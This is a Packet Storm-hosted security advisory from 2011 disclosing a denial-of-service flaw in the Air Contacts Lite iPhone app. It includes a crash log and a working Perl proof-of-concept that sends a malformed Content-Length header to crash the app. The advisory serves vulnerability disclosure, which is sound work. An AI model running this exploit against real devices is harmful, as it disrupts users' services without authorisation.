Twenty Year Anniversary

Air Contacts Lite Denial Of Service

Air Contacts Lite Denial Of Service
Posted Mar 10, 2011
Authored by ipax | Site dclabs.com.br

The Air Contacts Lite iPhone / iPod application suffers from a denial of service vulnerability.

tags | exploit, denial of service
systems | apple, iphone
MD5 | c9bfe2ee19e3e87489a8fb44e3e826aa

Air Contacts Lite Denial Of Service

Change Mirror Download
[Discussion]

- DcLabs Security Research Group advises about the following vulnerability(ies):

[Software]

- Air Contacts Lite (By i-NOVATiON GmbH)

[Vendor Product Description]

- Sharing contacts can't be easier. Wireless access to your iPhone
contacts from your Mac or PC.
This is the Lite Version of Air Contacts. If you want more features
please upgrade to the normal version.

Source:  - http://itunes.apple.com/us/app/air-contacts-lite/id3084752

[Advisory Timeline]

- 01/26/2011 -> Advisory sent to vendor. (No response)
- 02/15/2011 -> Advisory sent again to vendor. (No response)
- 03/04/2011 -> Advisory published.

[Impact]

- Low

[Affected Version]

- Air Contacts Lite (Free Version)
- Paid version may also be vulnerable
- Prior versions may also be vulnerable

[Bug Description and Proof of Concept]

- While sending crafted HTTP packets the program does not treat
invalid requests entering in a NSException crashing the program.

<NSException>
Tue Jan 25 21:42:02 Program Name[23594] <Error>: *** Terminating app
due to uncaught exception 'NSInvalidArgumentException', reason: '***
-[NSConcreteData initWithBytes:length:copy:freeWhenDone:bytesAreVM:]:
absurd length: 4294967295, maximum size: 2147483648 bytes'
*** Call stack at first throw:
(
     0   CoreFoundation                      0x3048e987
__exceptionPreprocess + 114
     1   libobjc.A.dylib                     0x33a0849d
objc_exception_throw + 24
     2   CoreFoundation                      0x3048e7c9 +[NSException
raise:format:arguments:] + 68
     3   CoreFoundation                      0x3048e803 +[NSException
raise:format:] + 34
     4   Foundation                          0x302d2a51
-[NSConcreteData initWithBytes:length:copy:freeWhenDone:bytesAreVM:] +
108
     5   Foundation                          0x302df845
-[NSData(NSData) initWithBytes:length:] + 36
     6   Foundation                          0x302f224f
+[NSData(NSData) dataWithBytes:length:] + 34
     7   Foundation                          0x303216ab
_performFileHandleSource + 722
     8   CoreFoundation
0x304447dd__CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ +
12
     9   CoreFoundation                      0x304165b7
__CFRunLoopDoSources0 + 382
     10  CoreFoundation                      0x30415e5b __CFRunLoopRun + 230
     11  CoreFoundation                      0x30415c87
CFRunLoopRunSpecific + 230
     12  CoreFoundation                      0x30415b8f CFRunLoopRunInMode + 58
     13  GraphicsServices                    0x31eec4ab GSEventRunModal + 114
     14  GraphicsServices                    0x31eec557 GSEventRun + 62
     15  UIKit                               0x313cf329
-[UIApplication _run] + 412
     16  UIKit                               0x313cce93 UIApplicationMain + 670
     17  Program Name                   0x00002f07 main + 42
     18  Program Name                   0x00002ea4 start + 52
)
<END NSException>

[PoC]

# Air contacts Lite (Denial of Service)
#!/usr/bin/perl
use IO::Socket;
      if (@ARGV < 1) {
              usage();
      }
      $ip     = $ARGV[0];
      $port   = $ARGV[1];
      print "[+] Sending request...\n";
      $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
      print $socket "GET http://www.dclabs.com.br HTTP/1.1\r\n";
      print $socket "Host: http://www.dclabs.com.br\r\n";
      print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";
      sleep(2);
      close($socket);
      print "[+] Done!\n";

sub usage() {
      print "[-] DcLabs - Air Contacts Lite (DoS)\n\n";
      print "[-] Usage: <". $0 ."> <host> <port>\n";
      print "[-] Example: ". $0 ." 127.0.0.1 80\n";
      exit;
}

All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br

[Patch(s) / Workaround]

No patch(s) / workaround(s) were provided.

[Greetz]

DcLabs Security Research Group.

--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    8 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    32 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    2 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    8 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close